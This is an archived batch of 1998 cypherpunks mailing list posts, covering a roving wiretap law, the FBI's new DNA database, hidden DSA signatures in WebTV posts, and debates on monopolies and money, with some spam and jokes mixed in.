educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 13 Oct 1998 06:53:49 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.30: U.S. lawmakers approve major wiretap law change
Message-ID: <199810122228.PAA05982@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.30: U.S. lawmakers approve major wiretap law change
Date: Mon, 12 Oct 1998 00:08:52 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.30: U.S. lawmakers approve major wiretap law change
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Monday October 12, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: Reuters News Service, (via Yahoo) October 8, 1998
http://biz.yahoo.com/

U.S. lawmakers approve major wiretap law change
(adds Senate approval, FBI comment)
http://biz.yahoo.com/rf/981008/b16.html

By
Aaron Pressman

WASHINGTON, Oct 8 (Reuters) - Without debate or notice, U.S. lawmakers on
Thursday approved a proposal long sought by the FBI that would dramatically
expand wiretapping authority -- an idea Congress openly rejected three
years ago.

The provision, allowing law enforcement agencies more easily to tap any
telephone used by or near a target individual instead of getting
authorization to tap specific phones, was added to the Intelligence
Authorization Conference report during a closed door meeting and filed with
the House and Senate on Monday.

The conference report was easily adopted by the House on Wednesday, despite
an objection to the wiretapping provision from Georgia Republican Bob Barr,
and by the Senate on Thursday.

Neither the House nor the Senate had included the provision, known as
roving wiretap authority, in their versions of the intelligence bill. But
lawmakers drafting the conference report, essentially a reconciliation of
the two versions, decided to include it.

Civil liberties groups were outraged by the expanded wiretapping authority
and the process of adding the provision in secret.

``Roving wiretaps are a major expansion of current government surveillance
power,'' said Alan Davidson, staff counsel at the Center for Democracy and
Technology in Washington.

``To take a controversial provision that affects the fundamental
constitutional liberties of the people and pass it behind closed doors
shows a shocking disregard for our democratic process.''

FBI officials said they needed to be able to get roving wiretap authority
more easily to catch criminals taking advantage of new telecommunications
technologies.

``This provision is just a refinement of the existing wiretap statute,''
said Barry Smith, supervisory special agent in the FBI's congressional
affairs office. ``It's just a matter of ensuring we have the means to
effectively pursue these violent criminals and terrorists.''

Under current rules, law enforcement agencies seeking roving wiretap
authority from a judge must prove that an individual is switching
telephones specifically for the purpose of evading a surveillance. The
standard has been difficult to meet and kept the number of roving wiretaps
approved to a minimum, a telephone industry official said.

Without roving authority, police must get permission from a judge for each
telephone line to be tapped.

Under the change approved this week, the police would need show only that
an individual's ``actions could have the effect of thwarting interception
from a specific facility.''

The change removed the need to consider the target's motive in using
different telephones.

Copyright (c) 1998 Reuters Limited.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 13 Oct 1998 06:54:40 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Secret Marine training mission startles residents
Message-ID: <199810122228.PAA05993@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Secret Marine training mission startles residents
Date: Mon, 12 Oct 1998 11:12:42 -0500
To: believer@telepath.com

Source:  Greensboro News & Record (N.Carolina)
http://www.greensboro.com/nronline/news/helicopters9.htm

Secret Marine training mission startles residents

10-9-98

By ANDREA BALL, Staff Writer

Fisher Park resident Helen Ullrich was resting in bed when she heard the
roar of the helicopters. The house shook. The windows rattled.

Her first thought: A plane is going to crash.

Her second: Where's it going to land?

"For the first minute or two, that's what it was like," she said. "Just fear."

Greensboro residents shuddered and gawked at the skies Wednesday night
while nine military helicopters
unexpectedly swarmed above their houses. The aircraft were involved in a
two-hour training mission by the 24th Marine Expeditionary Unit at Marine
Corps Base Camp Lejeune, said Capt. Bill Darrenkamp, public affairs officer
for Camp Lejeune.

The helicopters -- a Huey, two Cobras, two Super Stallions and four Sea
Knights -- flew from Onslow Bay to practice long-range raids, Darrenkamp
said. The local training session stretched from about 9:30 to 11:30 p.m.

The Greensboro Police Department agreed to the mission about a month ago,
Darrenkamp said. Nearly 200 families in the Huffine Mill Road area were
told of the training a few hours before it began.

The rest of the city was clueless. And that's the way the Marines wanted
it, said Capt. Sammy Bell of the Greensboro Police Department.

"We couldn't have notified the public on it because if we had, everyone and
their brother would be out there trying
to watch it," Bell said. 

Darrenkamp said the mission was kept quiet because Marines wanted the
training to be as realistic as possible. They also wanted to keep crowds
away from the planes when they landed because they can kick up dirt and
debris, he said. 

The nine helicopters flew from outside Jacksonville to Piedmont Triad
International Airport to refuel. Then they
landed at the old Mt. Zion School on Huffine Mill Road, where 50 to 60
Marines enacted an invasion of enemy
headquarters. They set off smoke grenades, shot blanks with their M-16s and
blew off a door specially installed for the military activity.

But the covert training alarmed people throughout the city. Although the
helicopters were often 400 feet from the
ground, Darrenkamp said they dipped much lower while landing. Some
residents complained that the helicopters barely missed their houses.

"That (height) was cleared, according to the military, by the FAA," said
Capt. David Wray of the Greensboro Police
Department. "We were assured that every safety measure would be taken."

Residents in neighborhoods throughout the city -- including downtown,
Lindley Park, Old Starmount, Forest Oaks and Lake Daniel -- heard or saw
the deafening craft. And then the guessing began.

Was it a crashing plane? An air search for an escaped convict? One of those
medical helicopters?

Brien Deutermanand her husband Bill were watching television in their Old
Starmount home when they heard the helicopters. The couple, seated on their
couch, whipped around to peer out their picture window.

A plane was in trouble, they guessed. They thought of the recent accident
in which a small plane crashed into a home in Winston-Salem.

"It really startled us," Brien Deuterman said. "After what happened in
Winston-Salem a few months ago, that was the first thing that ran through
our minds."

Helen Ullrich rushed outside her home on Isabel Street to find her
pajama-clad neighbors standing in the street,
squinting into the sky at the passing helicopters. Scared children clung to
their parents, while adults slowly
relaxed. Then came the jokes.

The government is scaring us out of our houses to get an accurate census.

If we're in danger, why are we all standing in the middle of the road?

"Once we realized we were out of danger, we were just laughing about it,"
Ullrich said.

Copyright (c) Greensboro News & Record, Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Tue, 13 Oct 1998 06:20:10 +0800
To: <cypherpunks@toad.com>
Subject: RE: DNA
In-Reply-To: <Pine.BSF.4.02A.9810121317430.21444-100000@shell16.ba.best.com>
Message-ID: <000001bdf62a$1a05f7e0$8a2580d0@xasper8d>
MIME-Version: 1.0
Content-Type: text/plain



A DNA Database can actually be used for many nifty things that will improve
the lives of taxpayers and consumers alike.  For example, if we only had the
resources to sample DNA from every American, then cross reference that DNA
with, say, their CREDIT REPORT, then we'd know what type of genetic make-up
has a predisposition toward not paying their bills and we'd save so many
untold billions of dollars by not lending those genetic deadbeats any more
money.  Interest rates would plummet!  Plus, if you had the _right_ DNA,
they could just approve you on the spot!

If we had a DNA sample of all world citizens, then the pesky problem of the
whole "it was either O.J. that was the killer or there's a one in five
billion chance it was someone else" would simply disappear.

And, just think of the social improvements:  why, if you forget to ask the
name of last nights suitor, you can scrape some DNA samples off the end of
your cat-o-nine-tails, slip it into your M.S. DNA Reader(tm) and instantly
add them to your outlook addressbook.  (That is, if they have good credit,
natch.)

Man, my verbosity gene is in overdrive today!

X


~> -----Original Message-----
~> From: owner-cypherpunks@minder.net
~> [mailto:owner-cypherpunks@minder.net]On Behalf Of Xena - Warrior
~> Princess
~> Sent: Monday, October 12, 1998 2:20 PM
~> To: cypherpunks@toad.com
~> Subject: DNA
~>
~>
~>
~>
~> Another example of science fiction that probably should have been kept as
~> fiction.
~>
~>
~> FBI to inaugurate national DNA database
~>
~> NEW YORK (Reuters) - The FBI will open a new and improved
~> national DNA database Tuesday that will be used to help
~> stop serial rapists and other repeat criminals, the New
~> York Times reported Monday.
~>
~> (Full story)
~> http://www.sjmercury.com/breaking/docs/084314.htm
~>
~>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 04:59:04 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Hidden WebTV signatures
Message-ID: <v0401170ab24818015048@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: Pablo Calamera <pablo@microsoft.com>
To: "'Robert Hettinga'" <rah@shipwright.com>,
        "'mac-crypto@vmeng.com'"
	 <mac-crypto@vmeng.com>
Subject: RE: Hidden WebTV signatures
Date: Mon, 12 Oct 1998 11:46:37 -0700

Yes.  Well, the crypto part anyways ;-)

> -----Original Message-----
> From: mac-crypto@vmeng.com [mailto:mac-crypto@vmeng.com]On Behalf Of
> Robert Hettinga
> Sent: Sunday, October 11, 1998 8:08 AM
> To: mac-crypto@vmeng.com
> Subject: Hidden WebTV signatures
>
>
> Pablo?
>
> Did *you* do this???
>
> :-)
>
> Cheers,
> Bob Hettinga
>
> --- begin forwarded text
>
>
> From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
> To: cypherpunks@cyberpass.net
> Subject: Hidden WebTV signatures
> X-Authenticated: relaymail v0.9 on cs26.cs.auckland.ac.nz
> Date: Mon, 12 Oct 1998 03:29:04 (NZDT)
> Sender: owner-cypherpunks@cyberpass.net
> Precedence: first-class
> Reply-To: pgut001@cs.auckland.ac.nz (Peter Gutmann)
> X-Loop: cypherpunks@cyberpass.net
>
> For those of you who don't read sci.crypt, Robert Ames
> <gnome@istar.ca> has
> posted an article in which he observes that all WebTV posts contain an
> X-WebTV-Signature: line containing base64-encoded data.  For
> samples of
> WebTV-generated posts, try the alt.weemba newsgroup, which is
> filled with
> WebTV-user drool (caution: remember to employ protection when
> exposting your
> mind to the content of the messages).  Some samples:
>
> X-WebTV-Signature: 1
>
> ETAsAhQDqtur/jfleJ2CDOnNrVoeyALEQAIUOQyCBbzjx5HHfxeMERDgCjztXOU=
> X-WebTV-Signature: 1
>
> ETAtAhUAmCCzQt+Tqt6fNX+L9+gDCECaqQkCFA0YCPz5tk85mUgq7iX/u4vWvOgG
>
> These decode into ASN.1-encoded DSA signatures, eg:
>
>    1 30   45: SEQUENCE {
>    3 02   21:   INTEGER
>             :     00 98 20 B3 42 DF 93 AA DE 9F 35 7F 8B F7 E8 03
>             :     08 40 9A A9 09
>   26 02   20:   INTEGER
>             :     0D 18 08 FC F9 B6 4F 39 99 48 2A EE 25 FF BB 8B
>             :     D6 BC E8 06
>             :   }
>
> for the second one.  The key isn't included in the header,
> presumably the
> @webtv.net address can be tied to the hardware which contains
> some hardcoded
> DSA key.  I wonder if WebTV users know they're signing each
> message they send?
>
> Peter.
>
>
> --- end forwarded text
>
>
> -----------------
> Robert A. Hettinga <mailto: rah@philodox.com>
> Philodox Financial Technology Evangelism <http://www.philodox.com/>
> 44 Farquhar Street, Boston, MA 02131 USA
> "... however it may deserve respect for its usefulness and antiquity,
> [predicting the end of the world] has not been found agreeable to
> experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>
>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adobe Systems <wcd@Adobe.COM>
Date: Tue, 13 Oct 1998 08:13:36 +0800
To: cypherpunks@toad.com
Subject: Your New Adobe Customer Number
Message-ID: <199810122339.QAA19114@mail-sea.sea.Adobe.COM>
MIME-Version: 1.0
Content-Type: text/plain




Thank you for registering with Adobe Systems, Inc. 

Your new Online Customer ID is: 9062604113320310

The PIN you entered and confirmed has been encrypted and stored with your
registration information.

Please remember your Customer ID and PIN for the next time you login as an
Adobe Customer on www.adobe.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Tue, 13 Oct 1998 08:50:08 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: FBI to inaugurate national DNA database
Message-ID: <018a01bdf63e$30a3fa60$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



I think it would be a very bad idea for civil liberties groups
to come out 100% against this.  So far all they have said
is that they intend to log all convicted criminals.  If the C.L.
groups complain about that, then it would be too easy for
the FBI to turn around and say, "Geez! These guys complain
about anything and everything we do!"

It would serve the civil liberties causes (and in particular, the
crypto cause) much better to view this with suspicion and
caution and strongly point out that, while this, on its face,
looks okay, the FBI have had a perfect record of always
pushing for more surveillence and more record tracking than
they previously promise to hold to.

Secondly, it is much more important to focus law makers on
the FBI's "constantly pushing for everything they can get
away with while talking BALANCE" behavior than to nickle
and dime every law favoring the FBI.  They must be shown
for their blatant lies rather than for their gray area behavior.

Otherwise, it's a very very tough battle.

Ern

-----Original Message-----
From: Jim Gillogly <jim@acm.org>
To: cypherpunks@cyberpass.net <cypherpunks@cyberpass.net>
Date: Monday, October 12, 1998 9:31 AM
Subject: FBI to inaugurate national DNA database


>
>SJMC retails a report from today's NYT:
>
>http://www.sjmercury.com/breaking/docs/084314.htm
>
>Executive summary:
>
>- Computer at secret location
>- Access limited to LE
>- All sex offenders get to contribute; felons in some States;
>  other contributors not yet determined. 
>
>-- 
> Jim Gillogly
> Highday, 21 Winterfilth S.R. 1998, 16:12
> 12.19.5.10.14, 5 Ix 7 Yax, Seventh Lord of Night
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: randrent <randrent@prodigy.net>
Date: Tue, 13 Oct 1998 09:11:34 +0800
To: <cypherpunks@toad.com>
Subject: #1 HOME BASED BUSINESS TWO YEARS RUNNING!!!
Message-ID: <419.436080.86392454randrent@prodigy.net>
MIME-Version: 1.0
Content-Type: text/plain



Forbes Magazine calls this the #1 home-based business two years running.

All you have to do is advertise the 800# and your code#.  They do the rest!
Earn $100 Fast Start Bonuses for referrals, Plus Residual Bonuses!
Fast Start Bonuses are paid every Friday!  You could receive a check next week!
Call today to get your Code Number.

1-800-811-2141  CODE #57978

No Selling, No Recruiting, No Meetings, No Inventory, No Quotas, No Hassles!!!

Call one of the toll free numbers listed below to hear just some of the testimonials
of success:

1-888-446-6951
1-888-269-7961
1-888-446-6949
1-888-438-4005
1-888-256-4767
1-888-703-5389
1-888-731-3457
1-888-715-0642

After you listen to these testimonials, please call Top Secrets Hotline at:

1-800-811-2141 use Code#57978 to get answers to any further questions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 13 Oct 1998 07:15:48 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Two Jims, Werner and Matt redefine socialism for their own en (fwd)
Message-ID: <199810122259.RAA03743@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Two Jims, Werner and Matt redefine socialism for their own en
> 	ds
> Date: Mon, 12 Oct 1998 14:24:16 -0700

> > multinational bank and local government. I can vote 
> > for my councillors. Some of them I my  neighbours.
> 
> So why can't your neighbors run a bank?

The same reason most people can't. Funny thing is, it's the same reason a
lot of bankers can't run banks.

> Distribute what and created by whom? Need I point out the obvious
> fallacy that wealth is a static sum.

Interesting. I don't see that particular axiom in my notes....what I see is
the assumption that markets and their growth are unlimited. Pesky things
like ecological impacts, social impacts, waste processing, etc. are no big
percentage (as in completely ignored).

> Abstract wealth and divorce it
> from the creator and you eliminate the motive to create.

An interesting but obtuse means of stating that economics are a result of
human action and not a fundamental force in nature.

> > And then Matt Gering replied to Ken Brown:
> > 
> > >> A monopolisitic supplier of some good has a measure 
> > >> of political power.
> > 
> > > Political power comes at the mean end of a gun, what 
> > > political power do monopolies have and how?
> 
> > And I was almost knocked over by the innocence, ignorance and 
> > naievety of such a statement.
> 
> The question was not rhetorical. Do you care to answer?

Political power is actualy a much broader sword than Marx (and yourself
apparently) would paint. It's invovled in such basic actions as saying thank
you and holding a door open for somebody. The political aspect is a
fundamental belief that what goes around comes around. If I, and enough
other people walk around opening doors for each other, do this then when I
can't open the door somebody likely will. It's a gamble in the basic nature
of humans, to do the same basic things within the same social environment
the same basic way. Things like economies of scale have fundamental bases in
these sorts of psychological insights. Those comparable behaviours very
seldom involve violence as a motive, let alone a method. People, all people,
behave badly when violence is involved.

Usualy violence is involved in creating a behaviour of compliance that runs
contrary to some fundamental behaviour of the individual(s) or on the overt
attempt to steal or kill (murder is incorrect because it implies a social
structure that doesn't actualy exist at this fundamental level).

> > What political power do monopolies have? The power 
> > to deny you things you need to live.
> 
> How? By denying the ability of others to supply them. By denying your
> right to create them. By (legitimately) denying your ability to steal
> them. 

Monopolies have the power to decide *YOUR* tomorrow. It isn't theirs at the
cost of a simple profit.
 
> > - it is preserved by  military and police authority.

And social institutions.

> Exactly. So eliminate those guns.

Beeeep. We're so SORRY (not)!!!! That's absolutely the WRONG answer EVER.

> "Reality is that which, when you stop believing in it, doesn't 
>  go away." -- Philip K. Dick
> 
> Fine, stop believing in money, no one is forcing you to. Did it work?
> Oh, you mean *everyone* has to stop believing in it? Sounds like mass
> delusion to me,

That is EXACTLY what I've been trying to say all along! Economics is a
social institution that has fundamental roots in the base behaviours of the
animals involved.

> What is the root of money?
> http://www.ecosystems.net/mgering/money.html

Hunger.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Tue, 13 Oct 1998 06:43:59 +0800
To: CypherPunks@Algebra.COM
Subject: What Really Happened
Message-ID: <3622A97B.3D09272C@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



What Really Happened

Some time ago Mr. Clinton was hosting a state dinner when at the
last minute his regular cook took ill and they had to get a
replacement at short notice. The fellow arrived and turned out to
be a very grubby looking man named Jon. The President voiced
his concerns to his chief of staff but was told that this was the
best they could do at such short notice.

Just before the meal, the President noticed the cook sticking his
fingers in the soup to taste it and again he complained to the chief
of staff about the cook, but he was told that this man was
supposed to be a very good chef. The meal went okay but the
President was sure that the soup tasted a little off, and by the time
dessert came, he was starting to have stomach cramps and nausea.

It was getting worse and worse till finally he had to excuse himself
from the state dinner to look for the bathroom. Passing through the
kitchen, he caught sight of the cook, Jon, scratching his rear end
and this made him feel even worse. By now he was desperately ill
with violent cramps and was so disorientated that he couldn't
remember which door led to the bathroom. 

He was on the verge of passing out from the pain when he finally
found a door that opened and as he undid his trousers and ran in,
he realised to his horror that he had stumbled into Monica
Lewinsky's office with his trousers around his knees.

As he was just about to pass out, she bent over him and heard her
president whisper in a barely audible voice, "sack my cook".

And that is how the whole misunderstanding occurred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 07:03:36 +0800
To: cypherpunks@cyberpass.net
Subject: RE: DNA
In-Reply-To: <Pine.BSF.4.02A.9810121317430.21444-100000@shell16.ba.best.com>
Message-ID: <v0401170bb24835372e74@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:48 PM -0400 on 10/12/98, X wrote:
> Man, my verbosity gene is in overdrive today!

Nope. You've just been reading too many, um, crypto-statist, Gore Vidal novels.

:-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Tue, 13 Oct 1998 07:14:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Tracking: Machines to Check Airline Bags Mostly Idle, Report Says
In-Reply-To: <199810122228.PAA05971@netcom13.netcom.com>
Message-ID: <3.0.3.32.19981012185102.0347e50c@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 03:28 PM 10/12/98 -0700, Vladimir Z. Nuri wrote:
>
>From: believer@telepath.com
>Subject: IP: Tracking: Machines to Check Airline Bags Mostly Idle, Report
Says
>Date: Sun, 11 Oct 1998 08:03:44 -0500
>To: believer@telepath.com
>
>Auditors also said that the machines in use could handle only about half
>as many bags as they did in lab tests, partly because they sound false
>alarms far more when in use at airports. Each false alarm requires time to
>resolve. (All alarms so far have been false, officials said, because no
>bombs have been detected.) 

Someone please correct me if I am wrong, but including the TWA flight that
precipitated this mess, isn't it true that for the last 20 years or so no
bombs have been known to get onto planes in the US even without the bomb
detectors?


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 09:09:02 +0800
To: cypherpunks@cyberpass.net
Subject: FYI: More on WebTV security
Message-ID: <v0401170fb248527e109c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: Pablo Calamera <pablo@microsoft.com>
To: "'mac-crypto@vmeng.com'" <mac-crypto@vmeng.com>
Subject: FYI: More on WebTV security
Date: Mon, 12 Oct 1998 16:34:14 -0700
Sender: <mac-crypto@vmeng.com>
Precedence: Bulk

Don't know if you've seen this, but we were recently granted a license to
ship 128-bit RC4 in our product.
No key recovery, no key escrow.  Here's the fluff:

	http://www.microsoft.com/presspass/press/1998/Oct98/EncryptionPR.htm

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 13 Oct 1998 03:22:29 +0800
To: cypherpunks@cyberpass.net
Subject: Gates v 2.0
Message-ID: <199810121902.VAA13050@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Besides the FBI's DNA database, in today's (Oct. 12th, 1998) 
New York Times is a John Markoff commentary "
Memo Offers a Glimpse of Gates 2.0" about a 14 page 
memo written by Bill Gates in Sept., entitled "The Era Ahead".

In this memo, Gates "describes a new system to be called Megaserver
which will provide computer users with access to their personal
information and electronic mail wherever they have an Internet 
connection."

Holy Hotmail Batman! That Bill is right on top of things!

Further along, the article paraphases Bill that that the operating 
system "will play an increasing role in protecting intellectual piracy
against from data piracy by tracking the use of information
and preventing illicit copying."

I can see my future now, logging into Windows 2000 with the handy 
keyboard DNA sampler. However, all of my software is registered to 
my dog. Here boy...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 13 Oct 1998 04:13:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gates v 2.0
In-Reply-To: <199810121902.VAA13050@replay.com>
Message-ID: <199810121942.VAA17805@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



  > I can see my future now, logging into Windows 2000 with the handy
  > keyboard DNA sampler.

ROTFL!

Can you imagine how disastrous wil be a DNA sampler designed
by the company that can't even produce a usable text editor?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <squirrel5@nym.alias.net>
Date: Tue, 13 Oct 1998 12:15:18 +0800
To: cypherpunks@Algebra.COM
Subject: Re:
Message-ID: <ecca3239a2aadc26d0b35b1a6a1a1020@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous wrote:
> 
> > >HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?
> >
> > How much code have you ever written?
> 
> A DECENT AMOUNT. THE CRYPTO APPS I CREATED ARE SOMEWHAT UNIQUE,
> SO IF I MENTIONED THEM YOU MIGHT FIGURE OUT WHO I AM.

Did you rewrite your keyboard driver at the same time?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 13 Oct 1998 10:32:44 +0800
To: cypherpunks@cyberpass.net
Subject: RE:
Message-ID: <199810130210.EAA25237@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



paranoid, or enlightened? :)

At 03:55 PM 10/10/98 , you wrote:

>~> PS. there is someone on this list who knows who
>~> i am. yes there is someone who knows who anon
>~> posters are. we fucking hate you and am waiting 
>~> for you to take the trap and we will reveal your
>~> identity scumbag. 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 13 Oct 1998 18:14:25 +0800
To: hua@teralogic-inc.com>
Subject: RE: FBI to inaugurate national DNA database
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F84C5@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Ernest Hua[SMTP:hua@teralogic-inc.com] wrote: 
> 
> I think it would be a very bad idea for civil liberties 
> groups to come out 100% against this.  So far all they
> have said is that they intend to log all convicted criminals.  
> If the C.L. groups complain about that, then it would be too 
> easy for the FBI to turn around and say, "Geez! These guys
> complain about anything and everything we do!"

I think you are falling for the old bazaar bargaining trick.  The guy
wants to sell you a carpet that is worth a shekel. He reckons he can do
you for ten shekels. So he starts the bidding at a hundred  and you
think you've done well when you've beaten him down to fifteen.  America
is - cypherpunks tell me - a country where people worry about their
social security number being kept on databases,  where caller id on
phones  can be a hot political issue.  This DNA business is far more
intrusive and dangerous than any of that. Don't fall for it!

Don't fall for the argument that it is only the bad guys who get tagged.
They can define anyone they want as a bad guy. How many people do you
know who have never done anything for which they could be convicted as a
criminal? Never driven a car faster then the speed limit, never smoked
dope, never ridden a bicycle on the pavement, never been drunk in a
public place? To a large extent the set of  "convicted criminals" is
governed by police or court decisions rather than by the actions of the
criminals.

Over here in Britain we've had a long succession of intrusive, abusive
laws promulgated in the name of public safety, law and order, peace on
the streets.  The previous government had their absurd "dangerous dogs
act" which became a laughing stock before the ink was dry then their
horrendous and evil  "Criminal Justice Bill"  with racist provisions
allowing the police to persecute travellers and uttely useless laws
against "music with repetitive beats" not to mention new rules to
control "young offenders, bailed  persons, squatters, travellers,
ravers,  protesters, trespassers, arrested persons,  defendants,
hunt-saboteurs, pornographers, video pirates, obscene telephone-callers,
prisoners, racists, terrorists, ticket touts, cannabis-smokers, serious
fraudsters and not  forgetting gay men under 18."

The current lot aren't as bad, and are certainly more well-intentioned
but they haven't repealed any of the earlier stuff and are, bit by bit,
